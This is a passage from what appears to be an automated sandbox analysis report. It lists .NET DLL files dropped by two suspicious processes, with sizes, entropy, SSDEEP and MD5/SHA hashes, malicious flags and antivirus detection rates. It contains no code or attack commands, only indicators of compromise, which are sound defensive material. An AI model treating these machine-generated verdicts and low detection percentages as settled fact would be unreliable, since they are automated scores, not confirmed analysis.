                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):34304
                                                                    Entropy (8bit):5.618776214605176
                                                                    Encrypted:false
                                                                    SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                    MD5:9B25959D6CD6097C0EF36D2496876249
                                                                    SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                    SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                    SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Joe Sandbox View:
                                                                    • Filename: 8G3thfOYd2.exe, Detection: malicious
                                                                    • Filename: z28NBu7i9a.exe, Detection: malicious
                                                                    • Filename: fzUk1a18ai.exe, Detection: malicious
                                                                    • Filename: 3BZPHrgjMP.exe, Detection: malicious
                                                                    • Filename: 1978044967A8E1C7F632630BC906C6D66B0E64C356345.exe, Detection: malicious
                                                                    • Filename: tQxaElvX5D.exe, Detection: malicious
                                                                    • Filename: 1E32C7CE3FECDE38E78A565C4CA60571ACA2B5B2A1C95.exe, Detection: malicious
                                                                    • Filename: 4y2bJd0meT.exe, Detection: malicious
                                                                    • Filename: 3b9330b09929cc5391a31e5780a967d26f21b010b586b.exe, Detection: malicious
                                                                    • Filename: Px0b16q72c.exe, Detection: malicious
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):33792
                                                                    Entropy (8bit):5.541771649974822
                                                                    Encrypted:false
                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):50176
                                                                    Entropy (8bit):5.723168999026349
                                                                    Encrypted:false
                                                                    SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                    MD5:2E116FC64103D0F0CF47890FD571561E
                                                                    SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                    SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                    SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):294912
                                                                    Entropy (8bit):6.010605469502259
                                                                    Encrypted:false
                                                                    SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                    MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                    SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                    SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                    SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):85504
                                                                    Entropy (8bit):5.8769270258874755
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):46592
                                                                    Entropy (8bit):5.870612048031897
                                                                    Encrypted:false
                                                                    SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                    MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                    SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                    SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                    SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):38912
                                                                    Entropy (8bit):5.679286635687991
                                                                    Encrypted:false
                                                                    SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                    MD5:9E910782CA3E88B3F87826609A21A54E
                                                                    SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                    SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                    SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):34816
                                                                    Entropy (8bit):5.636032516496583
                                                                    Encrypted:false
                                                                    SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                    MD5:996BD447A16F0A20F238A611484AFE86
                                                                    SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                    SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                    SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):41472
                                                                    Entropy (8bit):5.6808219961645605
                                                                    Encrypted:false
                                                                    SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                    MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                    SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                    SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                    SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):5.932541123129161
                                                                    Encrypted:false
                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):64000
                                                                    Entropy (8bit):5.857602289000348
                                                                    Encrypted:false
                                                                    SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                    MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                    SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                    SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                    SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):38400
                                                                    Entropy (8bit):5.699005826018714
                                                                    Encrypted:false
                                                                    SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                    MD5:87765D141228784AE91334BAE25AD743
                                                                    SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                    SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                    SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):70144
                                                                    Entropy (8bit):5.909536568846014
                                                                    Encrypted:false
                                                                    SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                    MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                    SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                    SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                    SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):34304
                                                                    Entropy (8bit):5.618776214605176
                                                                    Encrypted:false
                                                                    SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                    MD5:9B25959D6CD6097C0EF36D2496876249
                                                                    SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                    SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                    SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 10%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):85504
                                                                    Entropy (8bit):5.8769270258874755
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):294912
                                                                    Entropy (8bit):6.010605469502259
                                                                    Encrypted:false
                                                                    SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                    MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                    SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                    SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                    SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):46592
                                                                    Entropy (8bit):5.870612048031897
                                                                    Encrypted:false
                                                                    SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                    MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                    SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                    SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                    SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):34816
                                                                    Entropy (8bit):5.636032516496583
                                                                    Encrypted:false
                                                                    SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                    MD5:996BD447A16F0A20F238A611484AFE86
                                                                    SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                    SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                    SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):33792
                                                                    Entropy (8bit):5.541771649974822
                                                                    Encrypted:false
                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):50176
                                                                    Entropy (8bit):5.723168999026349
                                                                    Encrypted:false
                                                                    SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                    MD5:2E116FC64103D0F0CF47890FD571561E
                                                                    SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                    SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                    SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):38912
                                                                    Entropy (8bit):5.679286635687991
                                                                    Encrypted:false
                                                                    SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                    MD5:9E910782CA3E88B3F87826609A21A54E
                                                                    SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                    SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                    SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):38400
                                                                    Entropy (8bit):5.699005826018714
                                                                    Encrypted:false
                                                                    SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                    MD5:87765D141228784AE91334BAE25AD743
                                                                    SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                    SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                    SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):41472
                                                                    Entropy (8bit):5.6808219961645605
                                                                    Encrypted:false
                                                                    SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                    MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                    SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                    SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                    SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):70144
                                                                    Entropy (8bit):5.909536568846014
                                                                    Encrypted:false
                                                                    SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                    MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                    SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                    SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                    SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                    Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):64000
                                                                    Entropy (8bit):5.857602289000348
                                                                    Encrypted:false
                                                                    SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                    MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                    SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                    SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                    SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 10%
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):69632
                                                                    Entropy (8bit):5.932541123129161
                                                                    Encrypted:false
                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
